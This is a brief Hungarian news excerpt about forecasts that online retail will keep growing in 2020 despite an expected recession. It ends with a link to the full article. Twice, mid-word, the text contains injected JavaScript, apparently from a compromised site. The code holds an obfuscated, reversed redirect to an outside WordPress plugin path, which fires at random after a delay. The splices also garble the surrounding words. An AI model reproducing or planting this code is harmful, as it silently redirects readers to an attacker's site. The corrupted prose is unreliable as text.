Hozzátették, hogy bár az év második felére vásárlóerőcsökkenés és gazdasági recesszió várható (amely során az év végéig akár 3-7 százalék körül is csökkenhet a magyarországi GDP), az éves online forgalomban drasztikus váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozások helyett inkább csak átrendeződésekre számítanak. Úgy vélik, az első két negyedév megnövekedett online vásárlói bázisa és rendelésszáma segíthet abban, hogy az online kereskedelem az év második felében is tartani tudja a növekedés gyorsuló dinamikáját, így a piac a mostani kilátások alapján, a 2019-es 16 százalékos bővülést követően idén éves szinten mintegy 25 százalékkal növekedhet. Az online szektoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor gyors növekedésében szerepet játszott, hogy a járványhelyzet miatt fellendült az élelmiszerek,…
A cikk folytatódik: http://itmozaik.co.hu/hirek/2020/05/25/gki-digital-az-online-kiskereskedelem-21-4-szazalekkal-bovult-az-elso-negyedevben.html
- Hirdetés -